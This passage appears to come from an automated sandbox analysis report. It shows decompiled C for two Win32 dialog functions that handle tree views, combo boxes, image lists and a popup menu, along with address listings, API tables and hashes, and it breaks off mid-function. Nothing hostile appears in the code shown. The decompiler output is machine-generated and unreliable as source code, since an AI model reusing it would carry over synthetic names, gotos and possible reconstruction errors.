                                                                                            • Associated: 00000027.00000002.776751775.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: FilePointer
                                                                                            • String ID:
                                                                                            • API String ID: 973152223-0
                                                                                            • Opcode ID: b482a8c56bd79b67497ba547cc3d1d0f84b07fc9ac7ac5f50d4e9ed509354c89
                                                                                            • Instruction ID: aafe5e0ddee8b519ffd98e4e857b28c3b9165386d483fecacc2863ad1570d206
                                                                                            • Opcode Fuzzy Hash: b482a8c56bd79b67497ba547cc3d1d0f84b07fc9ac7ac5f50d4e9ed509354c89
                                                                                            • Instruction Fuzzy Hash: D6B01231544200BFDB214F00DF06F057B21B79C701F208030B340380F082712430EB1E
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Non-executed Functions

                                                                                            Function 00404802, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 478windowmemoryCOMMONCrypto
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 98%
                                                                                            			E00404802(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _v24;
				long _v28;
				int _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				intOrPtr _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t182;
				intOrPtr _t183;
				int _t189;
				int _t196;
				intOrPtr _t198;
				long _t202;
				signed int _t206;
				signed int _t217;
				void* _t220;
				void* _t221;
				int _t227;
				intOrPtr _t231;
				signed int _t232;
				signed int _t233;
				signed int _t240;
				signed int _t242;
				signed int _t245;
				signed int _t247;
				struct HBITMAP__* _t250;
				void* _t252;
				char* _t268;
				signed char _t269;
				long _t274;
				int _t280;
				signed int* _t281;
				int _t282;
				long _t283;
				signed int* _t284;
				int _t285;
				long _t286;
				signed int _t287;
				long _t288;
				signed int _t291;
				int _t294;
				signed int _t298;
				signed int _t300;
				signed int _t302;
				intOrPtr _t309;
				int* _t310;
				void* _t311;
				int _t315;
				int _t316;
				int _t317;
				signed int _t318;
				void* _t320;
				void* _t328;
				void* _t331;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_t182 = GetDlgItem(_a4, 0x408);
				_t280 =  *0x42ec48; // 0x6dc60c
				_t320 = SendMessageA;
				_v8 = _t182;
				_t183 =  *0x42ec30; // 0x6dc460
				_t315 = 0;
				_v32 = _t280;
				_v20 = _t183 + 0x94;
				if(_a8 != 0x110) {
					L23:
					__eflags = _a8 - 0x405;
					if(_a8 != 0x405) {
						_t289 = _a16;
					} else {
						_a12 = _t315;
						_t289 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					__eflags = _a8 - 0x4e;
					if(_a8 == 0x4e) {
						L28:
						__eflags = _a8 - 0x413;
						_v16 = _t289;
						if(_a8 == 0x413) {
							L30:
							__eflags =  *0x42ec39 & 0x00000002;
							if(( *0x42ec39 & 0x00000002) != 0) {
								L41:
								__eflags = _v16 - _t315;
								if(_v16 != _t315) {
									_t232 = _v16;
									__eflags =  *((intOrPtr*)(_t232 + 8)) - 0xfffffe6e;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
									}
									_t233 = _v16;
									__eflags =  *((intOrPtr*)(_t233 + 8)) - 0xfffffe6a;
									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
										__eflags =  *((intOrPtr*)(_t233 + 0xc)) - 2;
										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
											_t284 =  *(_t233 + 0x5c) * 0x418 + _t280 + 8;
											 *_t284 =  *_t284 & 0xffffffdf;
											__eflags =  *_t284;
										} else {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							__eflags = _a8 - 0x413;
							if(_a8 == 0x413) {
								L33:
								__eflags = _a8 - 0x413;
								_t289 = 0 | _a8 != 0x00000413;
								_t240 = E00404782(_v8, _a8 != 0x413);
								__eflags = _t240 - _t315;
								if(_t240 >= _t315) {
									_t93 = _t280 + 8; // 0x8
									_t310 = _t240 * 0x418 + _t93;
									_t289 =  *_t310;
									__eflags = _t289 & 0x00000010;
									if((_t289 & 0x00000010) == 0) {
										__eflags = _t289 & 0x00000040;
										if((_t289 & 0x00000040) == 0) {
											_t298 = _t289 ^ 0x00000001;
											__eflags = _t298;
										} else {
											_t300 = _t289 ^ 0x00000080;
											__eflags = _t300;
											if(_t300 >= 0) {
												_t298 = _t300 & 0xfffffffe;
											} else {
												_t298 = _t300 | 0x00000001;
											}
										}
										 *_t310 = _t298;
										E0040117D(_t240);
										_t242 =  *0x42ec38; // 0x80
										_t289 = 1;
										_a8 = 0x40f;
										_t245 =  !_t242 >> 0x00000008 & 1;
										__eflags = _t245;
										_a12 = 1;
										_a16 = _t245;
									}
								}
								goto L41;
							}
							_t289 = _a16;
							__eflags =  *((intOrPtr*)(_t289 + 8)) - 0xfffffffe;
							if( *((intOrPtr*)(_t289 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						}
						__eflags =  *((intOrPtr*)(_t289 + 4)) - 0x408;
						if( *((intOrPtr*)(_t289 + 4)) != 0x408) {
							goto L48;
						}
						goto L30;
					} else {
						__eflags = _a8 - 0x413;
						if(_a8 != 0x413) {
							L48:
							__eflags = _a8 - 0x111;
							if(_a8 != 0x111) {
								L56:
								__eflags = _a8 - 0x200;
								if(_a8 == 0x200) {
									SendMessageA(_v8, 0x200, _t315, _t315);
								}
								__eflags = _a8 - 0x40b;
								if(_a8 == 0x40b) {
									_t220 =  *0x42a07c;
									__eflags = _t220 - _t315;
									if(_t220 != _t315) {
										ImageList_Destroy(_t220);
									}
									_t221 =  *0x42a094;
									__eflags = _t221 - _t315;
									if(_t221 != _t315) {
										GlobalFree(_t221);
									}
									 *0x42a07c = _t315;
									 *0x42a094 = _t315;
									 *0x42ec80 = _t315;
								}
								__eflags = _a8 - 0x40f;
								if(_a8 != 0x40f) {
									L86:
									__eflags = _a8 - 0x420;
									if(_a8 == 0x420) {
										__eflags =  *0x42ec39 & 0x00000001;
										if(( *0x42ec39 & 0x00000001) != 0) {
											__eflags = _a16 - 0x20;
											_t189 = (0 | _a16 == 0x00000020) << 3;
											__eflags = _t189;
											_t316 = _t189;
											ShowWindow(_v8, _t316);
											ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
										}
									}
									goto L89;
								} else {
									E004011EF(_t289, _t315, _t315);
									__eflags = _a12 - _t315;
									if(_a12 != _t315) {
										E0040140B(8);
									}
									__eflags = _a16 - _t315;
									if(_a16 == _t315) {
										L73:
										E004011EF(_t289, _t315, _t315);
										__eflags =  *0x42ec4c - _t315; // 0x2
										_v32 =  *0x42a094;
										_t196 =  *0x42ec48; // 0x6dc60c
										_v60 = 0xf030;
										_v16 = _t315;
										if(__eflags <= 0) {
											L84:
											InvalidateRect(_v8, _t315, 1);
											_t198 =  *0x42e3fc; // 0x6e1cac
											__eflags =  *((intOrPtr*)(_t198 + 0x10)) - _t315;
											if( *((intOrPtr*)(_t198 + 0x10)) != _t315) {
												E0040473D(0x3ff, 0xfffffffb, E00404755(5));
											}
											goto L86;
										} else {
											_t142 = _t196 + 8; // 0x6dc614
											_t281 = _t142;
											do {
												_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
												__eflags = _t202 - _t315;
												if(_t202 != _t315) {
													_t291 =  *_t281;
													_v68 = _t202;
													__eflags = _t291 & 0x00000001;
													_v72 = 8;
													if((_t291 & 0x00000001) != 0) {
														_t151 =  &(_t281[4]); // 0x6dc624
														_v72 = 9;
														_v56 = _t151;
														_t154 =  &(_t281[0]);
														 *_t154 = _t281[0] & 0x000000fe;
														__eflags =  *_t154;
													}
													__eflags = _t291 & 0x00000040;
													if((_t291 & 0x00000040) == 0) {
														_t206 = (_t291 & 0x00000001) + 1;
														__eflags = _t291 & 0x00000010;
														if((_t291 & 0x00000010) != 0) {
															_t206 = _t206 + 3;
															__eflags = _t206;
														}
													} else {
														_t206 = 3;
													}
													_t294 = (_t291 >> 0x00000005 & 0x00000001) + 1;
													__eflags = _t294;
													_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
													SendMessageA(_v8, 0x1102, _t294, _v68);
													SendMessageA(_v8, 0x110d, _t315,  &_v72);
												}
												_v16 = _v16 + 1;
												_t281 =  &(_t281[0x106]);
												__eflags = _v16 -  *0x42ec4c; // 0x2
											} while (__eflags < 0);
											goto L84;
										}
									} else {
										_t282 = E004012E2( *0x42a094);
										E00401299(_t282);
										_t217 = 0;
										_t289 = 0;
										__eflags = _t282 - _t315;
										if(_t282 <= _t315) {
											L72:
											SendMessageA(_v12, 0x14e, _t289, _t315);
											_a16 = _t282;
											_a8 = 0x420;
											goto L73;
										} else {
											goto L69;
										}
										do {
											L69:
											_t309 = _v20;
											__eflags =  *((intOrPtr*)(_t309 + _t217 * 4)) - _t315;
											if( *((intOrPtr*)(_t309 + _t217 * 4)) != _t315) {
												_t289 = _t289 + 1;
												__eflags = _t289;
											}
											_t217 = _t217 + 1;
											__eflags = _t217 - _t282;
										} while (_t217 < _t282);
										goto L72;
									}
								}
							}
							__eflags = _a12 - 0x3f9;
							if(_a12 != 0x3f9) {
								goto L89;
							}
							__eflags = _a12 >> 0x10 - 1;
							if(_a12 >> 0x10 != 1) {
								goto L89;
							}
							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
							__eflags = _t227 - 0xffffffff;
							if(_t227 == 0xffffffff) {
								goto L89;
							}
							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
							__eflags = _t283 - 0xffffffff;
							if(_t283 == 0xffffffff) {
								L54:
								_t283 = 0x20;
								L55:
								E00401299(_t283);
								SendMessageA(_a4, 0x420, _t315, _t283);
								_a12 = 1;
								_a16 = _t315;
								_a8 = 0x40f;
								goto L56;
							}
							_t231 = _v20;
							__eflags =  *((intOrPtr*)(_t231 + _t283 * 4)) - _t315;
							if( *((intOrPtr*)(_t231 + _t283 * 4)) != _t315) {
								goto L55;
							}
							goto L54;
						}
						goto L28;
					}
				} else {
					 *0x42ec80 = _a4;
					_t247 =  *0x42ec4c; // 0x2
					_t285 = 2;
					_v28 = 0;
					_v16 = _t285;
					 *0x42a094 = GlobalAlloc(0x40, _t247 << 2);
					_t250 = LoadBitmapA( *0x42ec20, 0x6e);
					 *0x42a088 =  *0x42a088 | 0xffffffff;
					_v24 = _t250;
					 *0x42a090 = SetWindowLongA(_v8, 0xfffffffc, E00404E03);
					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42a07c = _t252;
					ImageList_AddMasked(_t252, _v24, 0xff00ff);
					SendMessageA(_v8, 0x1109, _t285,  *0x42a07c);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_v24);
					_t286 = 0;
					do {
						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
							if(_t286 != 0x20) {
								_v16 = _t315;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E00405BE9(_t286, _t315, _t320, _t315, _t258)), _t286);
						}
						_t286 = _t286 + 1;
					} while (_t286 < 0x21);
					_t317 = _a16;
					_t287 = _v16;
					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
					_push(0x15);
					E00403E83(_a4);
					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
					_push(0x16);
					E00403E83(_a4);
					_t318 = 0;
					_t288 = 0;
					_t328 =  *0x42ec4c - _t318; // 0x2
					if(_t328 <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t311 = _v32 + 8;
						_v24 = _t311;
						do {
							_t268 = _t311 + 0x10;
							if( *_t268 != 0) {
								_v60 = _t268;
								_t269 =  *_t311;
								_t302 = 0x20;
								_v84 = _t288;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t302;
								_v40 = _t318;
								_v68 = _t269 & _t302;
								if((_t269 & 0x00000002) == 0) {
									__eflags = _t269 & 0x00000004;
									if((_t269 & 0x00000004) == 0) {
										 *( *0x42a094 + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
									} else {
										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v28 = 1;
									 *( *0x42a094 + _t318 * 4) = _t274;
									_t288 =  *( *0x42a094 + _t318 * 4);
								}
							}
							_t318 = _t318 + 1;
							_t311 = _v24 + 0x418;
							_t331 = _t318 -  *0x42ec4c; // 0x2
							_v24 = _t311;
						} while (_t331 < 0);
						if(_v28 != 0) {
							L20:
							if(_v16 != 0) {
								E00403EB8(_v8);
								_t280 = _v32;
								_t315 = 0;
								__eflags = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00403EB8(_v12);
								L89:
								return E00403EEA(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}






































































                                                                                            0x00404820
                                                                                            0x00404826
                                                                                            0x00404828
                                                                                            0x0040482e
                                                                                            0x00404834
                                                                                            0x00404837
                                                                                            0x00404841
                                                                                            0x0040484a
                                                                                            0x0040484d
                                                                                            0x00404850
                                                                                            0x00404a78
                                                                                            0x00404a78
                                                                                            0x00404a7f
                                                                                            0x00404a93
                                                                                            0x00404a81
                                                                                            0x00404a83
                                                                                            0x00404a86
                                                                                            0x00404a87
                                                                                            0x00404a8e
                                                                                            0x00404a8e
                                                                                            0x00404a96
                                                                                            0x00404a9f
                                                                                            0x00404aaa
                                                                                            0x00404aaa
                                                                                            0x00404aad
                                                                                            0x00404ab0
                                                                                            0x00404abf
                                                                                            0x00404abf
                                                                                            0x00404ac6
                                                                                            0x00404b3e
                                                                                            0x00404b3e
                                                                                            0x00404b41
                                                                                            0x00404b43
                                                                                            0x00404b46
                                                                                            0x00404b4d
                                                                                            0x00404b5b
                                                                                            0x00404b5b
                                                                                            0x00404b5d
                                                                                            0x00404b60
                                                                                            0x00404b67
                                                                                            0x00404b69
                                                                                            0x00404b6d
                                                                                            0x00404b8a
                                                                                            0x00404b8e
                                                                                            0x00404b8e
                                                                                            0x00404b6f
                                                                                            0x00404b7c
                                                                                            0x00404b7c
                                                                                            0x00404b6d
                                                                                            0x00404b67
                                                                                            0x00000000
                                                                                            0x00404b41
                                                                                            0x00404ac8
                                                                                            0x00404acb
                                                                                            0x00404ad6
                                                                                            0x00404ad8
                                                                                            0x00404adb
                                                                                            0x00404ae2
                                                                                            0x00404ae7
                                                                                            0x00404ae9
                                                                                            0x00404af3
                                                                                            0x00404af3
                                                                                            0x00404af7
                                                                                            0x00404af9
                                                                                            0x00404afc
                                                                                            0x00404afe
                                                                                            0x00404b01
                                                                                            0x00404b17
                                                                                            0x00404b17
                                                                                            0x00404b03
                                                                                            0x00404b03
                                                                                            0x00404b09
                                                                                            0x00404b0b
                                                                                            0x00404b12
                                                                                            0x00404b0d
                                                                                            0x00404b0d
                                                                                            0x00404b0d
                                                                                            0x00404b0b
                                                                                            0x00404b1b
                                                                                            0x00404b1d
                                                                                            0x00404b22
                                                                                            0x00404b2b
                                                                                            0x00404b2c
                                                                                            0x00404b36
                                                                                            0x00404b36
                                                                                            0x00404b38
                                                                                            0x00404b3b
                                                                                            0x00404b3b
                                                                                            0x00404afc
                                                                                            0x00000000
                                                                                            0x00404ae9
                                                                                            0x00404acd
                                                                                            0x00404ad0
                                                                                            0x00404ad4
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00404ad4
                                                                                            0x00404ab2
                                                                                            0x00404ab9
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00404aa1
                                                                                            0x00404aa1
                                                                                            0x00404aa4
                                                                                            0x00404b91
                                                                                            0x00404b91
                                                                                            0x00404b98
                                                                                            0x00404c0c
                                                                                            0x00404c0c
                                                                                            0x00404c13
                                                                                            0x00404c1f
                                                                                            0x00404c1f
                                                                                            0x00404c21
                                                                                            0x00404c28
                                                                                            0x00404c2a
                                                                                            0x00404c2f
                                                                                            0x00404c31
                                                                                            0x00404c34
                                                                                            0x00404c34
                                                                                            0x00404c3a
                                                                                            0x00404c3f
                                                                                            0x00404c41
                                                                                            0x00404c44
                                                                                            0x00404c44
                                                                                            0x00404c4a
                                                                                            0x00404c50
                                                                                            0x00404c56
                                                                                            0x00404c56
                                                                                            0x00404c5c
                                                                                            0x00404c63
                                                                                            0x00404db0
                                                                                            0x00404db0
                                                                                            0x00404db7
                                                                                            0x00404db9
                                                                                            0x00404dc0
                                                                                            0x00404dc4
                                                                                            0x00404dd1
                                                                                            0x00404dd1
                                                                                            0x00404dd4
                                                                                            0x00404dda
                                                                                            0x00404dec
                                                                                            0x00404dec
                                                                                            0x00404dc0
                                                                                            0x00000000
                                                                                            0x00404c69
                                                                                            0x00404c6b
                                                                                            0x00404c70
                                                                                            0x00404c73
                                                                                            0x00404c77
                                                                                            0x00404c77
                                                                                            0x00404c7c
                                                                                            0x00404c7f
                                                                                            0x00404cc0
                                                                                            0x00404cc2
                                                                                            0x00404ccc
                                                                                            0x00404cd2
                                                                                            0x00404cd5
                                                                                            0x00404cda
                                                                                            0x00404ce1
                                                                                            0x00404ce4
                                                                                            0x00404d86
                                                                                            0x00404d8c
                                                                                            0x00404d92
                                                                                            0x00404d97
                                                                                            0x00404d9a
                                                                                            0x00404dab
                                                                                            0x00404dab
                                                                                            0x00000000
                                                                                            0x00404cea
                                                                                            0x00404cea
                                                                                            0x00404cea
                                                                                            0x00404ced
                                                                                            0x00404cf3
                                                                                            0x00404cf6
                                                                                            0x00404cf8
                                                                                            0x00404cfa
                                                                                            0x00404cfc
                                                                                            0x00404cff
                                                                                            0x00404d02
                                                                                            0x00404d09
                                                                                            0x00404d0b
                                                                                            0x00404d0e
                                                                                            0x00404d15
                                                                                            0x00404d18
                                                                                            0x00404d18
                                                                                            0x00404d18
                                                                                            0x00404d18
                                                                                            0x00404d1c
                                                                                            0x00404d1f
                                                                                            0x00404d2b
                                                                                            0x00404d2c
                                                                                            0x00404d2f
                                                                                            0x00404d31
                                                                                            0x00404d31
                                                                                            0x00404d31
                                                                                            0x00404d21
                                                                                            0x00404d23
                                                                                            0x00404d23
                                                                                            0x00404d50
                                                                                            0x00404d50
                                                                                            0x00404d51
                                                                                            0x00404d5d
                                                                                            0x00404d6c
                                                                                            0x00404d6c
                                                                                            0x00404d6e
                                                                                            0x00404d71
                                                                                            0x00404d7a
                                                                                            0x00404d7a
                                                                                            0x00000000
                                                                                            0x00404ced
                                                                                            0x00404c81
                                                                                            0x00404c8c
                                                                                            0x00404c8f
                                                                                            0x00404c94
                                                                                            0x00404c96
                                                                                            0x00404c98
                                                                                            0x00404c9a
                                                                                            0x00404caa
                                                                                            0x00404cb4
                                                                                            0x00404cb6
                                                                                            0x00404cb9
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00404c9c
                                                                                            0x00404c9c
                                                                                            0x00404c9c
                                                                                            0x00404c9f
                                                                                            0x00404ca2
                                                                                            0x00404ca4
                                                                                            0x00404ca4
                                                                                            0x00404ca4
                                                                                            0x00404ca5
                                                                                            0x00404ca6
                                                                                            0x00404ca6
                                                                                            0x00000000
                                                                                            0x00404c9c
                                                                                            0x00404c7f
                                                                                            0x00404c63
                                                                                            0x00404b9a
                                                                                            0x00404ba0
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00404bac
                                                                                            0x00404bb0
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00404bc0
                                                                                            0x00404bc2
                                                                                            0x00404bc5
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00404bd7
                                                                                            0x00404bd9
                                                                                            0x00404bdc
                                                                                            0x00404be6
                                                                                            0x00404be8
                                                                                            0x00404be9
                                                                                            0x00404bea
                                                                                            0x00404bf9
                                                                                            0x00404bfb
                                                                                            0x00404c02
                                                                                            0x00404c05
                                                                                            0x00000000
                                                                                            0x00404c05
                                                                                            0x00404bde
                                                                                            0x00404be1
                                                                                            0x00404be4
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00404be4
                                                                                            0x00000000
                                                                                            0x00404aa4
                                                                                            0x00404856
                                                                                            0x0040485b
                                                                                            0x00404860
                                                                                            0x00404865
                                                                                            0x00404866
                                                                                            0x0040486f
                                                                                            0x0040487a
                                                                                            0x00404885
                                                                                            0x0040488b
                                                                                            0x00404899
                                                                                            0x004048ae
                                                                                            0x004048b3
                                                                                            0x004048be
                                                                                            0x004048c7
                                                                                            0x004048dc
                                                                                            0x004048ed
                                                                                            0x004048fa
                                                                                            0x004048fa
                                                                                            0x004048ff
                                                                                            0x00404905
                                                                                            0x00404907
                                                                                            0x0040490a
                                                                                            0x0040490f
                                                                                            0x00404914
                                                                                            0x00404916
                                                                                            0x00404916
                                                                                            0x00404936
                                                                                            0x00404936
                                                                                            0x00404938
                                                                                            0x00404939
                                                                                            0x0040493e
                                                                                            0x00404941
                                                                                            0x00404944
                                                                                            0x00404948
                                                                                            0x0040494d
                                                                                            0x00404952
                                                                                            0x00404956
                                                                                            0x0040495b
                                                                                            0x00404960
                                                                                            0x00404962
                                                                                            0x00404964
                                                                                            0x0040496a
                                                                                            0x00404a34
                                                                                            0x00404a47
                                                                                            0x00000000
                                                                                            0x00404970
                                                                                            0x00404973
                                                                                            0x00404976
                                                                                            0x00404979
                                                                                            0x00404979
                                                                                            0x0040497f
                                                                                            0x00404985
                                                                                            0x00404988
                                                                                            0x0040498e
                                                                                            0x0040498f
                                                                                            0x00404994
                                                                                            0x0040499d
                                                                                            0x004049a4
                                                                                            0x004049a7
                                                                                            0x004049aa
                                                                                            0x004049ad
                                                                                            0x004049e7
                                                                                            0x004049e9
                                                                                            0x00404a12
                                                                                            0x004049eb
                                                                                            0x004049f8
                                                                                            0x004049f8
                                                                                            0x004049af
                                                                                            0x004049b2
                                                                                            0x004049c1
                                                                                            0x004049cb
                                                                                            0x004049d3
                                                                                            0x004049da
                                                                                            0x004049e2
                                                                                            0x004049e2
                                                                                            0x004049ad
                                                                                            0x00404a18
                                                                                            0x00404a19
                                                                                            0x00404a1f
                                                                                            0x00404a25
                                                                                            0x00404a25
                                                                                            0x00404a32
                                                                                            0x00404a4d
                                                                                            0x00404a51
                                                                                            0x00404a6e
                                                                                            0x00404a73
                                                                                            0x00404a76
                                                                                            0x00404a76
                                                                                            0x00000000
                                                                                            0x00404a53
                                                                                            0x00404a58
                                                                                            0x00404a61
                                                                                            0x00404dee
                                                                                            0x00404e00
                                                                                            0x00404e00
                                                                                            0x00404a51
                                                                                            0x00000000
                                                                                            0x00404a32
                                                                                            0x0040496a

                                                                                            APIs
                                                                                            • GetDlgItem.USER32 ref: 00404819
                                                                                            • GetDlgItem.USER32 ref: 00404826
                                                                                            • GlobalAlloc.KERNEL32(00000040,00000002), ref: 00404872
                                                                                            • LoadBitmapA.USER32 ref: 00404885
                                                                                            • SetWindowLongA.USER32(?,000000FC,00404E03), ref: 0040489F
                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004048B3
                                                                                            • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 004048C7
                                                                                            • SendMessageA.USER32(?,00001109,00000002), ref: 004048DC
                                                                                            • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 004048E8
                                                                                            • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 004048FA
                                                                                            • DeleteObject.GDI32(?), ref: 004048FF
                                                                                            • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 0040492A
                                                                                            • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404936
                                                                                            • SendMessageA.USER32(?,00001100,00000000,?), ref: 004049CB
                                                                                            • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 004049F6
                                                                                            • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A0A
                                                                                            • GetWindowLongA.USER32 ref: 00404A39
                                                                                            • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404A47
                                                                                            • ShowWindow.USER32(?,00000005), ref: 00404A58
                                                                                            • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404B5B
                                                                                            • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404BC0
                                                                                            • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404BD5
                                                                                            • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404BF9
                                                                                            • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404C1F
                                                                                            • ImageList_Destroy.COMCTL32(?), ref: 00404C34
                                                                                            • GlobalFree.KERNEL32 ref: 00404C44
                                                                                            • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404CB4
                                                                                            • SendMessageA.USER32(?,00001102,00000410,?), ref: 00404D5D
                                                                                            • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404D6C
                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00404D8C
                                                                                            • ShowWindow.USER32(?,00000000), ref: 00404DDA
                                                                                            • GetDlgItem.USER32 ref: 00404DE5
                                                                                            • ShowWindow.USER32(00000000), ref: 00404DEC
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000027.00000002.776267433.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000027.00000002.776225770.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776324072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776362591.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776529964.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776577449.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776659350.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776751775.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                            • String ID: $M$N
                                                                                            • API String ID: 1638840714-813528018
                                                                                            • Opcode ID: 03cda6e4da2b8fb4d01f8465d39c3ee25f13877e52dcc6e8ff3e3942391822dc
                                                                                            • Instruction ID: 6f0a98d5dd10ef4145f29f69d97320cca22844812bd755e22afdd9aff1593a00
                                                                                            • Opcode Fuzzy Hash: 03cda6e4da2b8fb4d01f8465d39c3ee25f13877e52dcc6e8ff3e3942391822dc
                                                                                            • Instruction Fuzzy Hash: A702B1B0A00209EFEB25CF95DD45AAE7BB5FB84314F10413AF610BA2E1C7799A41CF58
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00404FF1, Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 278windowclipboardmemoryCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 96%
                                                                                            			E00404FF1(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t87;
				unsigned int _t92;
				unsigned int _t93;
				int _t94;
				int _t95;
				long _t98;
				void* _t101;
				intOrPtr _t123;
				struct HWND__* _t127;
				int _t149;
				int _t150;
				struct HWND__* _t154;
				struct HWND__* _t158;
				struct HMENU__* _t160;
				long _t162;
				void* _t163;
				short* _t164;

				_t154 =  *0x42e404; // 0x0
				_t149 = 0;
				_v8 = _t154;
				if(_a8 != 0x110) {
					__eflags = _a8 - 0x405;
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00404F85, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L17:
						__eflags = _a8 - 0x404;
						if(_a8 != 0x404) {
							L25:
							__eflags = _a8 - 0x7b;
							if(_a8 != 0x7b) {
								goto L20;
							}
							__eflags = _a12 - _t154;
							if(_a12 != _t154) {
								goto L20;
							}
							_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
							__eflags = _t87 - _t149;
							_a8 = _t87;
							if(_t87 <= _t149) {
								L37:
								return 0;
							}
							_t160 = CreatePopupMenu();
							AppendMenuA(_t160, _t149, 1, E00405BE9(_t149, _t154, _t160, _t149, 0xffffffe1));
							_t92 = _a16;
							__eflags = _t92 - 0xffffffff;
							if(_t92 != 0xffffffff) {
								_t150 = _t92;
								_t93 = _t92 >> 0x10;
								__eflags = _t93;
								_t94 = _t93;
							} else {
								GetWindowRect(_t154,  &_v28);
								_t150 = _v28.left;
								_t94 = _v28.top;
							}
							_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
							_t162 = 1;
							__eflags = _t95 - 1;
							if(_t95 == 1) {
